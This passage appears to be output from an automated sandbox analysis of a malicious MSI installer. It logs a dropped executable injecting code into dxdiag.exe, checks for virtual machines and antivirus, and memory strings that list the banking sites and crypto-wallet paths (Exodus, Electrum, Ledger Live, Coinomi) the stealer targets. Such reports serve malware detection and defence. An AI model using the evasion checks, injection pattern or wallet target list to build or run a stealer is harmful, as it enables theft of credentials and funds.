              Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windowmanagementapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: inputhost.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.immersive.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netprofm.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: npmproxy.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\Installer\MSIAEB.tmpSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\Installer\MSIAEB.tmpSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: msit.msiStatic file information: File size 16847872 > 1048576
              Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: msit.msi, 5403ef.msi.2.dr
              Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdbm source: msit.msi, MSI839.tmp.2.dr, 5403ef.msi.2.dr
              Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdb source: msit.msi, MSI839.tmp.2.dr, 5403ef.msi.2.dr
              Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: msit.msi, MSI670.tmp.2.dr, 5403ef.msi.2.dr
              Source: MSI602.tmp.2.drStatic PE information: section name: .fptable
              Source: MSI670.tmp.2.drStatic PE information: section name: .fptable
              Source: MSI6FE.tmp.2.drStatic PE information: section name: .fptable
              Source: MSI79B.tmp.2.drStatic PE information: section name: .fptable
              Source: MSI839.tmp.2.drStatic PE information: section name: .fptable
              Source: MSI982.tmp.2.drStatic PE information: section name: .fptable
              Source: MSIAEB.tmp.2.drStatic PE information: section name: .fptable
              Source: MSIAEB.tmp.2.drStatic PE information: section name: _RDATA
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_3_028F695D push cs; retf 6_3_028F6912
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_3_0291D348 push cs; retf 6_3_0291D2FD
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_00442904 push es; ret 6_2_00442905
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_00445921 push es; iretd 6_2_0044592C
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_00438A00 push eax; mov dword ptr [esp], BEBFA0A1h6_2_00438A0E
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_00445A3C push ebx; ret 6_2_00445A3D
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_004423EC push es; ret 6_2_004423ED
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_0043B690 push eax; mov dword ptr [esp], E3E2E1D0h6_2_0043B692

              Persistence and Installation Behavior

              barindex
              Source: C:\Windows\System32\msiexec.exeExecutable created and started: C:\Windows\Installer\MSIAEB.tmpJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIAEB.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI602.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI670.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI982.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6FE.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI79B.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI839.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIAEB.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI602.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI670.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI982.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6FE.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI79B.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI839.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Windows\SysWOW64\dxdiag.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI602.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI982.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI670.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI79B.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI6FE.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI839.tmpJump to dropped file
              Source: C:\Windows\SysWOW64\dxdiag.exe TID: 5708Thread sleep time: -150000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
              Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
              Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
              Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
              Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
              Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
              Source: 5403ef.msi.2.drBinary or memory string: HKEY_USERSRegOpenKeyTransactedW::NetUserGetInfo() failed with error: \@invalid string_view positionVMware, Inc.VMware Virtual PlatformVMware7,1VMware20,1innotek GmbHVirtualBoxMicrosoft CorporationVirtual MachineVRTUALACRSYSA M IGetting system informationManufacturer [Model [BIOS [\\?\UNC\\\?\shim_clone%d.%d.%d.%dDllGetVersion[%!]%!ProgramFilesFolderCommonFilesFolderDesktopFolderAllUsersDesktopFolderAppDataFolderFavoritesFolderStartMenuFolderProgramMenuFolderStartupFolderFontsFolderLocalAppDataFolderCommonAppDataFolderProgramFiles64FolderProgramFilesProgramW6432SystemFolderSystem32FolderWindowsFolderWindowsVolumeTempFolderSETUPEXEDIRshfolder.dllSHGetFolderPathWProgramFilesAPPDATAPROGRAMFILES&+
              Source: dxdiag.exe, dxdiag.exe, 00000006.00000002.2307824056.00000000028EC000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2303635403.00000000028EC000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000002.2307824056.0000000002916000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2303635403.0000000002916000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
              Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
              Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A85000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
              Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
              Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
              Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
              Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
              Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
              Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
              Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
              Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
              Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
              Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
              Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
              Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
              Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
              Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
              Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
              Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
              Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
              Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
              Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
              Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
              Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
              Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
              Source: dxdiag.exe, 00000006.00000003.2229755879.0000000004A80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
              Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 6_2_00439E40 LdrInitializeThunk,6_2_00439E40
              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSIAEB.tmp "C:\Windows\Installer\MSIAEB.tmp"Jump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\Installer\MSIAEB.tmpMemory allocated: C:\Windows\SysWOW64\dxdiag.exe base: 400000 protect: page execute and read and writeJump to behavior
              Source: C:\Windows\Installer\MSIAEB.tmpMemory written: C:\Windows\SysWOW64\dxdiag.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\Installer\MSIAEB.tmpMemory written: C:\Windows\SysWOW64\dxdiag.exe base: 400000Jump to behavior
              Source: C:\Windows\Installer\MSIAEB.tmpMemory written: C:\Windows\SysWOW64\dxdiag.exe base: 401000Jump to behavior
              Source: C:\Windows\Installer\MSIAEB.tmpMemory written: C:\Windows\SysWOW64\dxdiag.exe base: 43E000Jump to behavior
              Source: C:\Windows\Installer\MSIAEB.tmpMemory written: C:\Windows\SysWOW64\dxdiag.exe base: 441000Jump to behavior
              Source: C:\Windows\Installer\MSIAEB.tmpMemory written: C:\Windows\SysWOW64\dxdiag.exe base: 451000Jump to behavior
              Source: C:\Windows\Installer\MSIAEB.tmpMemory written: C:\Windows\SysWOW64\dxdiag.exe base: 452000Jump to behavior
              Source: C:\Windows\Installer\MSIAEB.tmpMemory written: C:\Windows\SysWOW64\dxdiag.exe base: 2BC008Jump to behavior
              Source: C:\Windows\Installer\MSIAEB.tmpProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
              Source: C:\Windows\Installer\MSIAEB.tmpProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
              Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\Installer\MSIAEB.tmpCode function: 4_2_00007FF78E2E5D6C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,4_2_00007FF78E2E5D6C
              Source: C:\Windows\SysWOW64\dxdiag.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: dxdiag.exe, 00000006.00000003.2274430928.0000000002982000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000006.00000003.2274400610.000000000297C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Windows\SysWOW64\dxdiag.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: Process Memory Space: dxdiag.exe PID: 1708, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: dxdiag.exe, 00000006.00000003.2258750277.0000000002988000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
              Source: dxdiag.exe, 00000006.00000003.2258750277.0000000002988000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
              Source: dxdiag.exe, 00000006.00000003.2258810480.000000000297A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
              Source: dxdiag.exe, 00000006.00000003.2295268267.0000000002981000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: pdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"],"z":"Wallets/Le
              Source: dxdiag.exe, 00000006.00000003.2295268267.0000000002981000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: pdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"],"z":"Wallets/Le
              Source: dxdiag.exe, 00000006.00000003.2258810480.000000000297A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: dxdiag.exe, 00000006.00000003.2258810480.000000000297A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
